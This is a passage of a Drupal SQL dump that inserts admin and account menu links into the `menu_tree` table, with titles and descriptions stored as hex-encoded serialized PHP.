('admin', 38, 'system.admin_config_search', 'system.admin_config', 'system.admin_config_search', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a2253656172636820616e64206d65746164617461223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36343a22436f6e6669677572652073697465207365617263682c206d657461646174612c20616e642073656172636820656e67696e65206f7074696d697a6174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -10, 0x613a303a7b7d, 1, 3, 6, 23, 38, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 39, 'entity.path_alias.collection', 'system.admin_config_search', 'entity.path_alias.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a2255524c20616c6961736573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33343a2241646420637573746f6d2055524c7320746f206578697374696e672070617468732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'path', 1, 1, 0, -5, 0x613a303a7b7d, 0, 4, 6, 23, 38, 39, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 40, 'entity.search_page.collection', 'system.admin_config_search', 'entity.search_page.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22536561726368207061676573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35313a22436f6e6669677572652073656172636820706167657320616e642073656172636820696e646578696e67206f7074696f6e732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'search', 1, 1, 0, -10, 0x613a303a7b7d, 0, 4, 6, 23, 38, 40, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 41, 'system.admin_config_system', 'system.admin_config', 'system.admin_config_system', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2253797374656d223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34393a22436f6e66696775726520626173696320736974652073657474696e67732c20616374696f6e732c20616e642063726f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -20, 0x613a303a7b7d, 1, 3, 6, 23, 41, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 42, 'system.site_information_settings', 'system.admin_config_system', 'system.site_information_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a22426173696320736974652073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37373a224368616e67652073697465206e616d652c20656d61696c20616464726573732c20736c6f67616e2c2064656661756c742066726f6e7420706167652c20616e64206572726f722070616765732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -20, 0x613a303a7b7d, 0, 4, 6, 23, 41, 42, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 43, 'system.cron_settings', 'system.admin_config_system', 'system.cron_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2243726f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34303a224d616e616765206175746f6d617469632073697465206d61696e74656e616e6365207461736b732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 20, 0x613a303a7b7d, 0, 4, 6, 23, 41, 43, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 44, 'system.admin_config_ui', 'system.admin_config', 'system.admin_config_ui', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a225573657220696e74657266616365223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34343a22436f6e666967757265207468652061646d696e697374726174697665207573657220696e746572666163652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -15, 0x613a303a7b7d, 1, 3, 6, 23, 44, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 45, 'entity.shortcut_set.collection', 'system.admin_config_ui', 'entity.shortcut_set.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a2253686f727463757473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32393a2241646420616e64206d6f646966792073686f727463757420736574732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'shortcut', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 44, 45, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 46, 'system.admin_config_workflow', 'system.admin_config', 'system.admin_config_workflow', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22576f726b666c6f77223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32383a224d616e6167652074686520636f6e74656e7420776f726b666c6f772e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 5, 0x613a303a7b7d, 0, 3, 6, 23, 46, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 47, 'system.admin_config_content', 'system.admin_config', 'system.admin_config_content', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22436f6e74656e7420617574686f72696e67223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34333a22436f6e66696775726520636f6e74656e7420666f726d617474696e6720616e6420617574686f72696e672e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -15, 0x613a303a7b7d, 1, 3, 6, 23, 47, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 48, 'filter.admin_overview', 'system.admin_config_content', 'filter.admin_overview', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32343a225465787420666f726d61747320616e6420656469746f7273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37383a2253656c65637420616e6420636f6e666967757265207465787420656469746f72732c20616e6420686f7720636f6e74656e742069732066696c7465726564207768656e20646973706c617965642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'filter', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 47, 48, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 49, 'user.admin_index', 'system.admin_config', 'user.admin_index', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2250656f706c65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32343a22436f6e6669677572652075736572206163636f756e74732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'user', 1, 1, 0, -20, 0x613a303a7b7d, 1, 3, 6, 23, 49, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 50, 'entity.user.admin_form', 'user.admin_index', 'entity.user.admin_form', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a224163636f756e742073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a3130353a22436f6e6669677572652064656661756c742075736572206163636f756e742073657474696e67732c20696e636c7564696e67206669656c64732c20726567697374726174696f6e20726571756972656d656e74732c20616e6420656d61696c206d657373616765732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'user', 1, 1, 0, -10, 0x613a303a7b7d, 1, 4, 6, 23, 49, 50, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 51, 'system.admin_reports', 'system.admin', 'system.admin_reports', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a225265706f727473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33343a2256696577207265706f7274732c20757064617465732c20616e64206572726f72732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 5, 0x613a303a7b7d, 1, 2, 6, 51, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 52, 'dblog.overview', 'system.admin_reports', 'dblog.overview', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a22526563656e74206c6f67206d65737361676573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34333a2256696577206576656e74732074686174206861766520726563656e746c79206265656e206c6f676765642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'dblog', 1, 1, 0, -1, 0x613a303a7b7d, 0, 3, 6, 51, 52, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 53, 'dblog.page_not_found', 'system.admin_reports', 'dblog.page_not_found', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32373a22546f70202770616765206e6f7420666f756e6427206572726f7273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33363a2256696577202770616765206e6f7420666f756e6427206572726f7273202834303473292e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'dblog', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 51, 53, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 54, 'dblog.access_denied', 'system.admin_reports', 'dblog.access_denied', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32363a22546f7020276163636573732064656e69656427206572726f7273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33353a225669657720276163636573732064656e69656427206572726f7273202834303373292e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'dblog', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 51, 54, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm');
INSERT INTO `menu_tree` (`menu_name`, `mlid`, `id`, `parent`, `route_name`, `route_param_key`, `route_parameters`, `url`, `title`, `description`, `class`, `options`, `provider`, `enabled`, `discovered`, `expanded`, `weight`, `metadata`, `has_children`, `depth`, `p1`, `p2`, `p3`, `p4`, `p5`, `p6`, `p7`, `p8`, `p9`, `form_class`) VALUES
('admin', 55, 'entity.field_storage_config.collection', 'system.admin_reports', 'entity.field_storage_config.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a224669656c64206c697374223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33393a224f76657276696577206f66206669656c6473206f6e20616c6c20656e746974792074797065732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'field_ui', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 51, 55, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 56, 'system.status', 'system.admin_reports', 'system.status', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22537461747573207265706f7274223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34383a22476574206120737461747573207265706f72742061626f757420796f757220736974652773206f7065726174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -60, 0x613a303a7b7d, 0, 3, 6, 51, 56, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 57, 'views_ui.reports_plugins', 'system.admin_reports', 'views_ui.reports_plugins', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22566965777320706c7567696e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33383a224f76657276696577206f6620706c7567696e73207573656420696e20616c6c2076696577732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'views_ui', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 51, 57, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 58, 'dblog.search', 'system.admin_reports', 'dblog.search', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a22546f70207365617263682070687261736573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33333a2256696577206d6f737420706f70756c61722073656172636820706872617365732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, '', 1, 1, 0, 0, 0x613a303a7b7d, 0, 3, 6, 51, 58, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 59, 'entity.user.collection', 'system.admin', 'entity.user.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2250656f706c65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34353a224d616e6167652075736572206163636f756e74732c20726f6c65732c20616e64207065726d697373696f6e732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'user', 1, 1, 0, 4, 0x613a303a7b7d, 1, 2, 6, 59, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('account', 60, 'user.page', '', 'user.page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a224d79206163636f756e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'user', 1, 1, 0, -10, 0x613a303a7b7d, 0, 1, 60, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('account', 61, 'user.logout', '', '', '', 0x613a303a7b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\user\\Plugin\\Menu\\LoginLogoutMenuLink', 0x613a303a7b7d, 'user', 1, 1, 0, 10, 0x613a303a7b7d, 0, 1, 61, 0, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 62, 'update.status', 'system.admin_reports', 'update.status', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22417661696c61626c652075706461746573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a38323a22476574206120737461747573207265706f72742061626f757420617661696c61626c65207570646174657320666f7220796f757220696e7374616c6c6564206d6f64756c657320616e64207468656d65732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'update', 1, 1, 0, -50, 0x613a303a7b7d, 0, 3, 6, 51, 62, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 63, 'admin_toolbar_tools.help', 'system.admin', '<front>', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a2246726f6e742070616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -100, 0x613a303a7b7d, 1, 2, 6, 63, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 64, 'system.admin_index', 'admin_toolbar_tools.help', 'system.admin_index', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22496e646578223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -100, 0x613a303a7b7d, 0, 3, 6, 63, 64, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 65, 'system.run_cron', 'admin_toolbar_tools.help', 'admin_toolbar.run.cron', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a2252756e2063726f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -8, 0x613a303a7b7d, 0, 3, 6, 63, 65, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 66, 'system.db_update', 'admin_toolbar_tools.help', 'system.db_update', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a2252756e2075706461746573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -6, 0x613a303a7b7d, 0, 3, 6, 63, 66, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 67, 'admin_toolbar_tools.flush', 'admin_toolbar_tools.help', 'admin_toolbar_tools.flush', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a22466c75736820616c6c20636163686573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -9, 0x613a303a7b7d, 1, 3, 6, 63, 67, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
